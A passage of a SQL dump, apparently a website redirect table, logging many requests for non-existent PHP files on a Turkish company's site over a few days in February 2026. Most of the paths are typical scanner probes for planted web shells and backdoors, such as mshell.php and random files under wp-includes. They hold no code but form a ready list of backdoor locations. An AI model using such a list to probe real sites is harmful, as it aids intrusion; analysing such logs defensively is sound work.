19:43:14','0000-00-00 00:00:00',301),(57769,'http://www.3s-technologies.com.tr/tr/assets/js/wp-session.php',NULL,'','',1,0,'2026-02-19 19:43:15','0000-00-00 00:00:00',301),(57770,'http://www.3s-technologies.com.tr/tr/wp-includes/buy.php',NULL,'','',1,0,'2026-02-19 19:43:16','0000-00-00 00:00:00',301),(57771,'http://www.3s-technologies.com.tr/tr/wp-includes/pomo/wp-includes/pomo/about.php',NULL,'','',1,0,'2026-02-19 19:43:18','0000-00-00 00:00:00',301),(57772,'http://www.3s-technologies.com.tr/tr/wp-includes/js/client-dashboard.php',NULL,'','',1,0,'2026-02-19 19:43:19','0000-00-00 00:00:00',301),(57773,'http://www.3s-technologies.com.tr/tr/wp-content/uploads/wpr-addons/forms/copypaths.php',NULL,'','',1,0,'2026-02-19 19:43:19','0000-00-00 00:00:00',301),(57774,'http://www.3s-technologies.com.tr/tr/wp-includes/id3/getid3s.php',NULL,'','',1,0,'2026-02-19 19:43:21','0000-00-00 00:00:00',301),(57775,'http://www.3s-technologies.com.tr/tr/assets/lufix.php',NULL,'','',1,0,'2026-02-19 19:43:22','0000-00-00 00:00:00',301),(57776,'http://www.3s-technologies.com.tr/tr/vendor/wp-login.php',NULL,'','',1,0,'2026-02-19 19:43:24','0000-00-00 00:00:00',301),(57777,'http://www.3s-technologies.com.tr/tr/chosen/function.php',NULL,'','',2,0,'2026-02-19 19:43:25','0000-00-00 00:00:00',301),(57778,'http://www.3s-technologies.com.tr/tr/wp-includes/simplepie/decode/admin.php',NULL,'','',1,0,'2026-02-19 19:43:30','0000-00-00 00:00:00',301),(57779,'http://www.3s-technologies.com.tr/tr/wp-content/uploads/js_composer/index.php',NULL,'','',1,0,'2026-02-19 19:43:33','0000-00-00 00:00:00',301),(57780,'http://www.3s-technologies.com.tr/tr/wp-cache.php',NULL,'','',1,0,'2026-02-19 19:43:34','0000-00-00 00:00:00',301),(57781,'http://www.3s-technologies.com.tr/tr/images/index1.php',NULL,'','',1,0,'2026-02-19 19:43:35','0000-00-00 00:00:00',301),(57782,'http://www.3s-technologies.com.tr/tr/js/upload.php',NULL,'','',1,0,'2026-02-19 19:43:36','0000-00-00 00:00:00',301),(57783,'http://www.3s-technologies.com.tr/tr/images/uploadform.php',NULL,'','',1,0,'2026-02-19 19:43:37','0000-00-00 00:00:00',301),(57784,'http://www.3s-technologies.com.tr/tr/wp-content/cache/page/index.php',NULL,'','',1,0,'2026-02-19 19:43:38','0000-00-00 00:00:00',301),(57785,'http://www.3s-technologies.com.tr/tr/images/contacto.php',NULL,'','',1,0,'2026-02-19 19:43:40','0000-00-00 00:00:00',301),(57786,'http://www.3s-technologies.com.tr/tr/.well-known/acme-challenge/aboud.php',NULL,'','',1,0,'2026-02-19 19:43:41','0000-00-00 00:00:00',301),(57787,'http://www.3s-technologies.com.tr/tr/ioxi002.php',NULL,'','',1,0,'2026-02-19 19:43:42','0000-00-00 00:00:00',301),(57788,'http://www.3s-technologies.com.tr/tr/wp-includes/widgets/index.php',NULL,'','',1,0,'2026-02-19 19:43:43','0000-00-00 00:00:00',301),(57789,'http://www.3s-technologies.com.tr/tr/wp-admin/images/lint-branch.php',NULL,'','',1,0,'2026-02-19 19:43:44','0000-00-00 00:00:00',301),(57790,'http://www.3s-technologies.com.tr/tr/css/upload.php',NULL,'','',1,0,'2026-02-19 19:43:44','0000-00-00 00:00:00',301),(57791,'http://www.3s-technologies.com.tr/tr/wp-content/uploads/2018/03/ab.php',NULL,'','',1,0,'2026-02-19 19:43:45','0000-00-00 00:00:00',301),(57792,'http://www.3s-technologies.com.tr/tr/css/wp-blog.php',NULL,'','',1,0,'2026-02-19 19:43:46','0000-00-00 00:00:00',301),(57793,'http://www.3s-technologies.com.tr/tr/wp-content/themes/gaukingo/db.php',NULL,'','',1,0,'2026-02-19 19:43:47','0000-00-00 00:00:00',301),(57794,'http://www.3s-technologies.com.tr/tr/resources/cache.php',NULL,'','',1,0,'2026-02-19 19:43:50','0000-00-00 00:00:00',301),(57795,'http://www.3s-technologies.com.tr/tr/images/g3.php',NULL,'','',1,0,'2026-02-19 19:43:54','0000-00-00 00:00:00',301),(57796,'http://www.3s-technologies.com.tr/tr/.well-known/wp-login.php',NULL,'','',2,0,'2026-02-19 19:43:55','0000-00-00 00:00:00',301),(57797,'http://www.3s-technologies.com.tr/tr/wp-content/themes/twentytwenty/404.php',NULL,'','',2,0,'2026-02-19 19:43:58','0000-00-00 00:00:00',301),(57798,'http://www.3s-technologies.com.tr/tr/wp-includes/cs.php',NULL,'','',1,0,'2026-02-19 19:43:59','0000-00-00 00:00:00',301),(57799,'http://www.3s-technologies.com.tr/tr/baxa1.php8',NULL,'','',1,0,'2026-02-19 19:44:00','0000-00-00 00:00:00',301),(57800,'http://www.3s-technologies.com.tr/tr/wp-admin/maint/singlex.php',NULL,'','',1,0,'2026-02-19 19:44:01','0000-00-00 00:00:00',301),(57801,'http://www.3s-technologies.com.tr/tr/wp-includes/css/data.php',NULL,'','',1,0,'2026-02-19 19:44:03','0000-00-00 00:00:00',301),(57802,'http://www.3s-technologies.com.tr/tr/x/index.php',NULL,'','',1,0,'2026-02-19 19:44:04','0000-00-00 00:00:00',301),(57803,'http://www.3s-technologies.com.tr/tr/wp-content/cache/about.php',NULL,'','',1,0,'2026-02-19 19:44:05','0000-00-00 00:00:00',301),(57804,'http://www.3s-technologies.com.tr/tr/main1/index2.php',NULL,'','',1,0,'2026-02-19 19:44:09','0000-00-00 00:00:00',301),(57805,'http://www.3s-technologies.com.tr/tr/images/2008.php',NULL,'','',1,0,'2026-02-19 19:44:10','0000-00-00 00:00:00',301),(57806,'http://www.3s-technologies.com.tr/tr/.well-known/nam.php',NULL,'','',1,0,'2026-02-19 19:44:12','0000-00-00 00:00:00',301),(57807,'http://www.3s-technologies.com.tr/tr/.well-known/cflsintdaf.php',NULL,'','',1,0,'2026-02-19 19:44:15','0000-00-00 00:00:00',301),(57808,'http://www.3s-technologies.com.tr/tr/wp-admin/css/colors/blue/file.php',NULL,'','',2,0,'2026-02-19 19:44:17','0000-00-00 00:00:00',301),(57809,'http://www.3s-technologies.com.tr/tr/wp-admin/images/browser.php',NULL,'','',1,0,'2026-02-19 19:44:19','0000-00-00 00:00:00',301),(57810,'http://www.3s-technologies.com.tr/tr/wp-admin/acme.php',NULL,'','',1,0,'2026-02-19 19:44:20','0000-00-00 00:00:00',301),(57811,'http://www.3s-technologies.com.tr/tr/wp-includes/phpmailer/admin.php',NULL,'','',1,0,'2026-02-19 19:44:20','0000-00-00 00:00:00',301),(57812,'http://www.3s-technologies.com.tr/tr/wp-includes/author-template-less.php',NULL,'','',1,0,'2026-02-19 19:44:21','0000-00-00 00:00:00',301),(57813,'http://www.3s-technologies.com.tr/tr/e/data.php',NULL,'','',1,0,'2026-02-19 19:44:24','0000-00-00 00:00:00',301),(57814,'http://www.3s-technologies.com.tr/tr/favicon.php',NULL,'','',2,0,'2026-02-19 19:44:28','0000-00-00 00:00:00',301),(57815,'http://www.3s-technologies.com.tr/tr/fox.php',NULL,'','',1,0,'2026-02-19 19:44:28','0000-00-00 00:00:00',301),(57816,'http://www.3s-technologies.com.tr/tr/themes/db.php',NULL,'','',1,0,'2026-02-19 19:44:30','0000-00-00 00:00:00',301),(57817,'http://www.3s-technologies.com.tr/tr/mod/assign/favicon.php',NULL,'','',1,0,'2026-02-19 19:44:32','0000-00-00 00:00:00',301),(57818,'http://3s-technologies.com.tr/tr/63.php',NULL,'','',1,0,'2026-02-19 20:44:00','0000-00-00 00:00:00',301),(57819,'http://3s-technologies.com.tr/tr/64.php',NULL,'','',1,0,'2026-02-19 20:44:01','0000-00-00 00:00:00',301),(57820,'http://3s-technologies.com.tr/tr/65.php',NULL,'','',1,0,'2026-02-19 20:44:01','0000-00-00 00:00:00',301),(57821,'http://3s-technologies.com.tr/tr/73.php',NULL,'','',1,0,'2026-02-19 20:44:07','0000-00-00 00:00:00',301),(57822,'http://3s-technologies.com.tr/tr/78.php',NULL,'','',1,0,'2026-02-19 20:44:10','0000-00-00 00:00:00',301),(57823,'http://3s-technologies.com.tr/tr/80.php',NULL,'','',1,0,'2026-02-19 20:44:11','0000-00-00 00:00:00',301),(57824,'http://3s-technologies.com.tr/tr/81.php',NULL,'','',1,0,'2026-02-19 20:44:12','0000-00-00 00:00:00',301),(57825,'http://3s-technologies.com.tr/tr/83.php',NULL,'','',1,0,'2026-02-19 20:44:13','0000-00-00 00:00:00',301),(57826,'http://3s-technologies.com.tr/tr/84.php',NULL,'','',1,0,'2026-02-19 20:44:14','0000-00-00 00:00:00',301),(57827,'http://3s-technologies.com.tr/tr/85.php',NULL,'','',1,0,'2026-02-19 20:44:15','0000-00-00 00:00:00',301),(57828,'http://3s-technologies.com.tr/tr/94.php',NULL,'','',1,0,'2026-02-19 20:44:21','0000-00-00 00:00:00',301),(57829,'http://3s-technologies.com.tr/tr/eursi.php',NULL,'','',7,0,'2026-02-20 00:19:58','0000-00-00 00:00:00',301),(57830,'http://3s-technologies.com.tr/tr/whtrq.php',NULL,'','',5,0,'2026-02-20 00:20:00','0000-00-00 00:00:00',301),(57831,'http://3s-technologies.com.tr/tr/ppxhp.php',NULL,'','',6,0,'2026-02-20 00:20:01','0000-00-00 00:00:00',301),(57832,'http://3s-technologies.com.tr/tr/bfasb.php',NULL,'','',5,0,'2026-02-20 00:20:09','0000-00-00 00:00:00',301),(57833,'http://3s-technologies.com.tr/tr/utchiha_o1jfauaf.php',NULL,'','',5,0,'2026-02-20 00:20:09','0000-00-00 00:00:00',301),(57834,'http://3s-technologies.com.tr/tr/isvqf.php',NULL,'','',5,0,'2026-02-20 00:20:10','0000-00-00 00:00:00',301),(57835,'http://3s-technologies.com.tr/tr/gkojz.php',NULL,'','',5,0,'2026-02-20 00:20:11','0000-00-00 00:00:00',301),(57836,'http://3s-technologies.com.tr/tr/defeg.php',NULL,'','',5,0,'2026-02-20 00:20:14','0000-00-00 00:00:00',301),(57837,'http://3s-technologies.com.tr/tr/ws58.php',NULL,'','',8,0,'2026-02-20 00:20:15','0000-00-00 00:00:00',301),(57838,'http://3s-technologies.com.tr/tr/rkiea.php',NULL,'','',8,0,'2026-02-20 00:20:16','0000-00-00 00:00:00',301),(57839,'http://3s-technologies.com.tr/tr/utchiha_py4me1xy.php',NULL,'','',5,0,'2026-02-20 00:20:19','0000-00-00 00:00:00',301),(57840,'http://3s-technologies.com.tr/tr/ws59.php',NULL,'','',8,0,'2026-02-20 00:20:22','0000-00-00 00:00:00',301),(57841,'http://3s-technologies.com.tr/tr/zu.php',NULL,'','',11,0,'2026-02-20 00:20:23','0000-00-00 00:00:00',301),(57842,'http://3s-technologies.com.tr/tr/prosellers8.php',NULL,'','',4,0,'2026-02-20 00:20:25','0000-00-00 00:00:00',301),(57843,'http://3s-technologies.com.tr/tr/dgmry.php',NULL,'','',5,0,'2026-02-20 00:20:26','0000-00-00 00:00:00',301),(57844,'http://3s-technologies.com.tr/tr/clcdu.php',NULL,'','',6,0,'2026-02-20 00:20:27','0000-00-00 00:00:00',301),(57845,'http://3s-technologies.com.tr/tr/ws56.php',NULL,'','',5,0,'2026-02-20 00:20:31','0000-00-00 00:00:00',301),(57846,'http://3s-technologies.com.tr/tr/ovatools.php',NULL,'','',1,0,'2026-02-20 05:37:34','0000-00-00 00:00:00',301),(57847,'http://3s-technologies.com.tr/tr/.rxr.php',NULL,'','',1,0,'2026-02-20 05:37:35','0000-00-00 00:00:00',301),(57848,'http://3s-technologies.com.tr/tr/iwpairbj.php',NULL,'','',1,0,'2026-02-20 05:37:42','0000-00-00 00:00:00',301),(57849,'http://3s-technologies.com.tr/tr/options-head.php',NULL,'','',2,0,'2026-02-20 05:37:44','0000-00-00 00:00:00',301),(57850,'http://3s-technologies.com.tr/tr/temdbypv.php',NULL,'','',1,0,'2026-02-20 05:37:44','0000-00-00 00:00:00',301),(57851,'http://3s-technologies.com.tr/tr/above.php',NULL,'','',1,0,'2026-02-20 05:37:47','0000-00-00 00:00:00',301),(57852,'http://3s-technologies.com.tr/tr/tfrh.php',NULL,'','',1,0,'2026-02-20 05:37:53','0000-00-00 00:00:00',301),(57853,'http://3s-technologies.com.tr/tr/zxhfwqyt.php',NULL,'','',1,0,'2026-02-20 05:37:57','0000-00-00 00:00:00',301),(57854,'http://3s-technologies.com.tr/tr/cadastro-2.php',NULL,'','',1,0,'2026-02-20 05:37:59','0000-00-00 00:00:00',301),(57855,'http://3s-technologies.com.tr/tr/class-walker-category-dropdown-class.php',NULL,'','',1,0,'2026-02-20 05:38:05','0000-00-00 00:00:00',301),(57856,'http://3s-technologies.com.tr/tr/stxdsoxv.php',NULL,'','',1,0,'2026-02-20 05:38:06','0000-00-00 00:00:00',301),(57857,'http://3s-technologies.com.tr/tr/fymdshrq.php',NULL,'','',1,0,'2026-02-20 05:38:07','0000-00-00 00:00:00',301),(57858,'http://3s-technologies.com.tr/tr/yzyol.php',NULL,'','',1,0,'2026-02-20 05:38:09','0000-00-00 00:00:00',301),(57859,'http://3s-technologies.com.tr/tr/com_search.php',NULL,'','',1,0,'2026-02-20 05:38:10','0000-00-00 00:00:00',301),(57860,'http://3s-technologies.com.tr/tr/blkdimxx.php',NULL,'','',1,0,'2026-02-20 05:38:15','0000-00-00 00:00:00',301),(57861,'http://3s-technologies.com.tr/tr/mshell.php',NULL,'','',1,0,'2026-02-20 05:38:19','0000-00-00 00:00:00',301),(57862,'http://3s-technologies.com.tr/tr/cpabpkyk.php',NULL,'','',1,0,'2026-02-20 05:38:22','0000-00-00 00:00:00',301),(57863,'http://3s-technologies.com.tr/tr/pchgflmv.php',NULL,'','',1,0,'2026-02-20 05:38:23','0000-00-00 00:00:00',301),(57864,'http://3s-technologies.com.tr/tr/add.php',NULL,'','',4,0,'2026-02-20 05:38:24','0000-00-00 00:00:00',301),(57865,'http://3s-technologies.com.tr/tr/hrtp.php',NULL,'','',1,0,'2026-02-20 05:38:25','0000-00-00 00:00:00',301),(57866,'http://3s-technologies.com.tr/tr/mail_logs.php',NULL,'','',1,0,'2026-02-20 05:38:28','0000-00-00 00:00:00',301),(57867,'http://3s-technologies.com.tr/tr/lzmrjmgg.php',NULL,'','',1,0,'2026-02-20 05:38:32','0000-00-00 00:00:00',301),(57868,'http://3s-technologies.com.tr/tr/ckyocyyp.php',NULL,'','',1,0,'2026-02-20 05:38:35','0000-00-00 00:00:00',301),(57869,'http://3s-technologies.com.tr/tr/mall.php',NULL,'','',1,0,'2026-02-20 05:38:41','0000-00-00 00:00:00',301),(57870,'http://3s-technologies.com.tr/tr/jlquntrkbfci.php',NULL,'','',1,0,'2026-02-20 05:38:42','0000-00-00 00:00:00',301),(57871,'http://3s-technologies.com.tr/tr/ndex.php',NULL,'','',1,0,'2026-02-20 05:38:48','0000-00-00 00:00:00',301),(57872,'http://3s-technologies.com.tr/tr/b0x.php',NULL,'','',1,0,'2026-02-20 05:38:50','0000-00-00 00:00:00',301),(57873,'http://3s-technologies.com.tr/tr/vote.php',NULL,'','',1,0,'2026-02-20 05:38:52','0000-00-00 00:00:00',301),(57874,'http://3s-technologies.com.tr/tr/xdqablrk.php',NULL,'','',1,0,'2026-02-20 05:38:57','0000-00-00 00:00:00',301),(57875,'http://3s-technologies.com.tr/tr/load-scripts.php',NULL,'','',1,0,'2026-02-20 05:39:00','0000-00-00 00:00:00',301),(57876,'http://3s-technologies.com.tr/tr/user_panel.php',NULL,'','',1,0,'2026-02-20 05:39:01','0000-00-00 00:00:00',301),(57877,'http://3s-technologies.com.tr/tr/jodohghi.php',NULL,'','',6,0,'2026-02-20 08:05:43','0000-00-00 00:00:00',301),(57878,'http://3s-technologies.com.tr/tr/kbfr.php',NULL,'','',34,0,'2026-02-20 08:05:44','0000-00-00 00:00:00',301),(57879,'http://3s-technologies.com.tr/tr/lmlwpbmm.php',NULL,'','',4,0,'2026-02-20 08:05:52','0000-00-00 00:00:00',301),(57880,'http://mail.3s-technologies.com.tr/tr/d.php',NULL,'','',15,0,'2026-02-20 12:52:53','0000-00-00 00:00:00',301),(57881,'http://3s-technologies.com.tr/tr/thui.php',NULL,'','',11,0,'2026-02-20 19:25:06','0000-00-00 00:00:00',301),(57882,'http://3s-technologies.com.tr/tr/selesai.php',NULL,'','',5,0,'2026-02-20 19:25:08','0000-00-00 00:00:00',301),(57883,'http://3s-technologies.com.tr/tr/bzjdlofz.php',NULL,'','',5,0,'2026-02-20 19:25:13','0000-00-00 00:00:00',301),(57884,'http://3s-technologies.com.tr/tr/wp-style.php',NULL,'','',6,0,'2026-02-20 19:25:17','0000-00-00 00:00:00',301),(57885,'http://3s-technologies.com.tr/tr/logs1.php',NULL,'','',5,0,'2026-02-20 19:25:20','0000-00-00 00:00:00',301),(57886,'http://3s-technologies.com.tr/tr/lanka.php',NULL,'','',6,0,'2026-02-20 19:25:21','0000-00-00 00:00:00',301),(57887,'http://3s-technologies.com.tr/tr/knmt.php',NULL,'','',5,0,'2026-02-20 19:25:22','0000-00-00 00:00:00',301),(57888,'http://3s-technologies.com.tr/tr/cc13.php',NULL,'','',12,0,'2026-02-20 19:25:27','0000-00-00 00:00:00',301),(57889,'http://3s-technologies.com.tr/tr/ccu.php',NULL,'','',17,0,'2026-02-20 19:25:33','0000-00-00 00:00:00',301),(57890,'http://3s-technologies.com.tr/tr/gk.php',NULL,'','',17,0,'2026-02-20 19:25:36','0000-00-00 00:00:00',301),(57891,'http://3s-technologies.com.tr/tr/zxekqlxb.php',NULL,'','',5,0,'2026-02-20 19:25:37','0000-00-00 00:00:00',301),(57892,'http://3s-technologies.com.tr/tr/ws69.php',NULL,'','',5,0,'2026-02-20 19:25:40','0000-00-00 00:00:00',301),(57893,'http://3s-technologies.com.tr/tr/wp-link10.php',NULL,'','',5,0,'2026-02-20 19:25:43','0000-00-00 00:00:00',301),(57894,'http://3s-technologies.com.tr/tr/cytyr.php',NULL,'','',5,0,'2026-02-20 19:25:49','0000-00-00 00:00:00',301),(57895,'http://3s-technologies.com.tr/tr/ws68.php',NULL,'','',12,0,'2026-02-20 19:25:53','0000-00-00 00:00:00',301),(57896,'http://3s-technologies.com.tr/tr/w1px.php',NULL,'','',3,0,'2026-02-20 19:25:54','0000-00-00 00:00:00',301),(57897,'http://3s-technologies.com.tr/tr/galer.php',NULL,'','',3,0,'2026-02-20 19:25:55','0000-00-00 00:00:00',301),(57898,'http://3s-technologies.com.tr/tr/x2x.php',NULL,'','',1,0,'2026-02-20 22:03:18','0000-00-00 00:00:00',301),(57899,'http://3s-technologies.com.tr/tr/bc-456.php',NULL,'','',1,0,'2026-02-20 22:03:21','0000-00-00 00:00:00',301),(57900,'http://mail.3s-technologies.com.tr/tr/wp-content/themes/sky-pro/js.php',NULL,'','',3,0,'2026-02-20 23:38:05','0000-00-00 00:00:00',301),(57901,'http://mail.3s-technologies.com.tr/tr/zqhfn.php',NULL,'','',2,0,'2026-02-20 23:38:16','0000-00-00 00:00:00',301),(57902,'http://mail.3s-technologies.com.tr/tr/fimai.php',NULL,'','',2,0,'2026-02-20 23:38:19','0000-00-00 00:00:00',301),(57903,'http://mail.3s-technologies.com.tr/tr/maul.php',NULL,'','',11,0,'2026-02-20 23:38:20','0000-00-00 00:00:00',301),(57904,'http://mail.3s-technologies.com.tr/tr/orouu.php',NULL,'','',2,0,'2026-02-20 23:38:27','0000-00-00 00:00:00',301),(57905,'http://mail.3s-technologies.com.tr/tr/kalso.php',NULL,'','',2,0,'2026-02-20 23:38:32','0000-00-00 00:00:00',301),(57906,'http://mail.3s-technologies.com.tr/tr/wp-includes/text/diff/index.php',NULL,'','',4,0,'2026-02-20 23:38:38','0000-00-00 00:00:00',301),(57907,'http://mail.3s-technologies.com.tr/tr/wp-includes/requests/about.php',NULL,'','',3,0,'2026-02-20 23:38:39','0000-00-00 00:00:00',301),(57908,'http://mail.3s-technologies.com.tr/tr/zc-104.php',NULL,'','',11,0,'2026-02-20 23:38:46','0000-00-00 00:00:00',301),(57909,'http://mail.3s-technologies.com.tr/tr/vanda.php',NULL,'','',11,0,'2026-02-20 23:38:50','0000-00-00 00:00:00',301),(57910,'http://mail.3s-technologies.com.tr/tr/wp-includes/js/jcrop/jcrop.php',NULL,'','',2,0,'2026-02-20 23:38:53','0000-00-00 00:00:00',301),(57911,'http://mail.3s-technologies.com.tr/tr/plugins/function.php',NULL,'','',3,0,'2026-02-20 23:38:55','0000-00-00 00:00:00',301),(57912,'http://mail.3s-technologies.com.tr/tr/wp-includes/pomo/index.php',NULL,'','',3,0,'2026-02-20 23:38:56','0000-00-00 00:00:00',301),(57913,'http://mail.3s-technologies.com.tr/tr/asd.php',NULL,'','',19,0,'2026-02-20 23:39:00','0000-00-00 00:00:00',301),(57914,'http://mail.3s-technologies.com.tr/tr/wp-content/languages/plugins/index.php',NULL,'','',5,0,'2026-02-20 23:39:20','0000-00-00 00:00:00',301),(57915,'http://mail.3s-technologies.com.tr/tr/wp-admin/css/wp-login.php',NULL,'','',4,0,'2026-02-20 23:39:21','0000-00-00 00:00:00',301),(57916,'http://mail.3s-technologies.com.tr/tr/images/all.php',NULL,'','',2,0,'2026-02-20 23:39:22','0000-00-00 00:00:00',301),(57917,'http://mail.3s-technologies.com.tr/tr/wp-admin/maint/wp-login.php',NULL,'','',3,0,'2026-02-20 23:39:27','0000-00-00 00:00:00',301),(57918,'http://mail.3s-technologies.com.tr/tr/varb.php',NULL,'','',11,0,'2026-02-20 23:39:35','0000-00-00 00:00:00',301),(57919,'http://mail.3s-technologies.com.tr/tr/xxzdc.php',NULL,'','',2,0,'2026-02-20 23:39:38','0000-00-00 00:00:00',301),(57920,'http://mail.3s-technologies.com.tr/tr/lm15.php',NULL,'','',11,0,'2026-02-20 23:39:46','0000-00-00 00:00:00',301),(57921,'http://mail.3s-technologies.com.tr/tr/hehe.php',NULL,'','',11,0,'2026-02-20 23:39:51','0000-00-00 00:00:00',301),(57922,'http://mail.3s-technologies.com.tr/tr/bo.php',NULL,'','',11,0,'2026-02-20 23:39:54','0000-00-00 00:00:00',301),(57923,'http://mail.3s-technologies.com.tr/tr/a5e0a.php',NULL,'','',11,0,'2026-02-20 23:39:55','0000-00-00 00:00:00',301),(57924,'http://3s-technologies.com.tr/tr/zqhfn.php',NULL,'','',2,0,'2026-02-21 01:55:00','0000-00-00 00:00:00',301),(57925,'http://3s-technologies.com.tr/tr/fimai.php',NULL,'','',2,0,'2026-02-21 01:55:03','0000-00-00 00:00:00',301),(57926,'http://3s-technologies.com.tr/tr/orouu.php',NULL,'','',2,0,'2026-02-21 01:55:09','0000-00-00 00:00:00',301),(57927,'http://3s-technologies.com.tr/tr/kalso.php',NULL,'','',2,0,'2026-02-21 01:55:13','0000-00-00 00:00:00',301),(57928,'http://3s-technologies.com.tr/tr/wp-content/languages/plugins/index.php',NULL,'','',9,0,'2026-02-21 01:55:51','0000-00-00 00:00:00',301),(57929,'http://3s-technologies.com.tr/tr/images/all.php',NULL,'','',3,0,'2026-02-21 01:55:53','0000-00-00 00:00:00',301),(57930,'http://3s-technologies.com.tr/tr/xxzdc.php',NULL,'','',2,0,'2026-02-21 01:56:03','0000-00-00 00:00:00',301),(57931,'http://3s-technologies.com.tr/tr/sm.php',NULL,'','',4,0,'2026-02-21 07:28:51','0000-00-00 00:00:00',301),(57932,'http://mail.3s-technologies.com.tr/tr/sm.php',NULL,'','',2,0,'2026-02-21 11:50:52','0000-00-00 00:00:00',301),(57933,'http://mail.3s-technologies.com.tr/tr/meew.php',NULL,'','',1,0,'2026-02-21 14:34:59','0000-00-00 00:00:00',301),(57934,'http://mail.3s-technologies.com.tr/tr/add.php',NULL,'','',4,0,'2026-02-21 14:35:00','0000-00-00 00:00:00',301),(57935,'http://mail.3s-technologies.com.tr/tr/sys.php',NULL,'','',29,0,'2026-02-21 14:35:04','0000-00-00 00:00:00',301),(57936,'http://mail.3s-technologies.com.tr/tr/mass.php',NULL,'','',2,0,'2026-02-21 14:35:05','0000-00-00 00:00:00',301),(57937,'http://mail.3s-technologies.com.tr/tr/71.php',NULL,'','',2,0,'2026-02-21 14:35:07','0000-00-00 00:00:00',301),(57938,'http://mail.3s-technologies.com.tr/tr/txets.php',NULL,'','',30,0,'2026-02-21 14:35:17','0000-00-00 00:00:00',301),(57939,'http://mail.3s-technologies.com.tr/tr/options-head.php',NULL,'','',2,0,'2026-02-21 14:35:17','0000-00-00 00:00:00',301),(57940,'http://mail.3s-technologies.com.tr/tr/cmdo.php',NULL,'','',2,0,'2026-02-21 14:35:19','0000-00-00 00:00:00',301),(57941,'http://mail.3s-technologies.com.tr/tr/x57.php',NULL,'','',18,0,'2026-02-21 14:36:34','0000-00-00 00:00:00',301),(57942,'http://mail.3s-technologies.com.tr/tr/public/vx.php',NULL,'','',23,0,'2026-02-21 14:37:03','0000-00-00 00:00:00',301),(57943,'http://3s-technologies.com.tr/tr/confq.php',NULL,'','',3,0,'2026-02-22 01:30:45','0000-00-00 00:00:00',301),(57944,'http://3s-technologies.com.tr/tr/add-user.php',NULL,'','',1,0,'2026-02-22 02:43:44','0000-00-00 00:00:00',301),(57945,'http://www.3s-technologies.com.tr/tr/ws58.php',NULL,'','',2,0,'2026-02-22 05:37:41','0000-00-00 00:00:00',301),(57946,'http://www.3s-technologies.com.tr/tr/baixy.php',NULL,'','',2,0,'2026-02-22 05:37:46','0000-00-00 00:00:00',301),(57947,'http://www.3s-technologies.com.tr/tr/zu.php',NULL,'','',3,0,'2026-02-22 05:37:47','0000-00-00 00:00:00',301),(57948,'http://www.3s-technologies.com.tr/tr/kbfr.php',NULL,'','',3,0,'2026-02-22 05:37:47','0000-00-00 00:00:00',301),(57949,'http://www.3s-technologies.com.tr/tr/a332.php',NULL,'','',2,0,'2026-02-22 05:37:49','0000-00-00 00:00:00',301),(57950,'http://www.3s-technologies.com.tr/tr/f2.php',NULL,'','',2,0,'2026-02-22 05:37:50','0000-00-00 00:00:00',301),(57951,'http://www.3s-technologies.com.tr/tr/to.php',NULL,'','',2,0,'2026-02-22 05:37:51','0000-00-00 00:00:00',301),(57952,'http://www.3s-technologies.com.tr/tr/inege.php',NULL,'','',6,0,'2026-02-22 05:37:51','0000-00-00 00:00:00',301),(57953,'http://www.3s-technologies.com.tr/tr/thui.php',NULL,'','',4,0,'2026-02-22 05:37:52','0000-00-00 00:00:00',301),(57954,'http://www.3s-technologies.com.tr/tr/fresh3.php',NULL,'','',2,0,'2026-02-22 05:37:54','0000-00-00 00:00:00',301),(57955,'http://www.3s-technologies.com.tr/tr/selesai.php',NULL,'','',2,0,'2026-02-22 05:37:54','0000-00-00 00:00:00',301),(57956,'http://www.3s-technologies.com.tr/tr/xs.php',NULL,'','',3,0,'2026-02-22 05:37:55','0000-00-00 00:00:00',301),(57957,'http://www.3s-technologies.com.tr/tr/maraz.php',NULL,'','',2,0,'2026-02-22 05:37:55','0000-00-00 00:00:00',301),(57958,'http://www.3s-technologies.com.tr/tr/erty.php',NULL,'','',5,0,'2026-02-22 05:37:57','0000-00-00 00:00:00',301),(57959,'http://www.3s-technologies.com.tr/tr/bzjdlofz.php',NULL,'','',2,0,'2026-02-22 05:37:58','0000-00-00 00:00:00',301),(57960,'http://www.3s-technologies.com.tr/tr/sbhu.php',NULL,'','',8,0,'2026-02-22 05:37:59','0000-00-00 00:00:00',301),(57961,'http://www.3s-technologies.com.tr/tr/wp-style.php',NULL,'','',2,0,'2026-02-22 05:38:02','0000-00-00 00:00:00',301),(57962,'http://www.3s-technologies.com.tr/tr/error_log.php',NULL,'','',3,0,'2026-02-22 05:38:03','0000-00-00 00:00:00',301),(57963,'http://www.3s-technologies.com.tr/tr/logs1.php',NULL,'','',2,0,'2026-02-22 05:38:05','0000-00-00 00:00:00',301),(57964,'http://www.3s-technologies.com.tr/tr/lanka.php',NULL,'','',2,0,'2026-02-22 05:38:06','0000-00-00 00:00:00',301),(57965,'http://www.3s-technologies.com.tr/tr/knmt.php',NULL,'','',2,0,'2026-02-22 05:38:07','0000-00-00 00:00:00',301),(57966,'http://www.3s-technologies.com.tr/tr/ioxi.php',NULL,'','',6,0,'2026-02-22 05:38:07','0000-00-00 00:00:00',301),(57967,'http://www.3s-technologies.com.tr/tr/lkui.php',NULL,'','',2,0,'2026-02-22 05:38:08','0000-00-00 00:00:00',301),(57968,'http://www.3s-technologies.com.tr/tr/wp-admin/css/colors/blue/about.php',NULL,'','',2,0,'2026-02-22 05:38:09','0000-00-00 00:00:00',301),(57969,'http://www.3s-technologies.com.tr/tr/easy.php',NULL,'','',2,0,'2026-02-22 05:38:10','0000-00-00 00:00:00',301),(57970,'http://www.3s-technologies.com.tr/tr/s1.php',NULL,'','',2,0,'2026-02-22 05:38:11','0000-00-00 00:00:00',301),(57971,'http://www.3s-technologies.com.tr/tr/cc13.php',NULL,'','',2,0,'2026-02-22 05:38:11','0000-00-00 00:00:00',301),(57972,'http://www.3s-technologies.com.tr/tr/export.php',NULL,'','',2,0,'2026-02-22 05:38:13','0000-00-00 00:00:00',301),(57973,'http://www.3s-technologies.com.tr/tr/ccu.php',NULL,'','',2,0,'2026-02-22 05:38:17','0000-00-00 00:00:00',301),(57974,'http://www.3s-technologies.com.tr/tr/xsox.php',NULL,'','',2,0,'2026-02-22 05:38:18','0000-00-00 00:00:00',301),(57975,'http://www.3s-technologies.com.tr/tr/gk.php',NULL,'','',2,0,'2026-02-22 05:38:19','0000-00-00 00:00:00',301),(57976,'http://www.3s-technologies.com.tr/tr/zoo.php',NULL,'','',4,0,'2026-02-22 05:38:20','0000-00-00 00:00:00',301),(57977,'http://www.3s-technologies.com.tr/tr/zxekqlxb.php',NULL,'','',2,0,'2026-02-22 05:38:20','0000-00-00 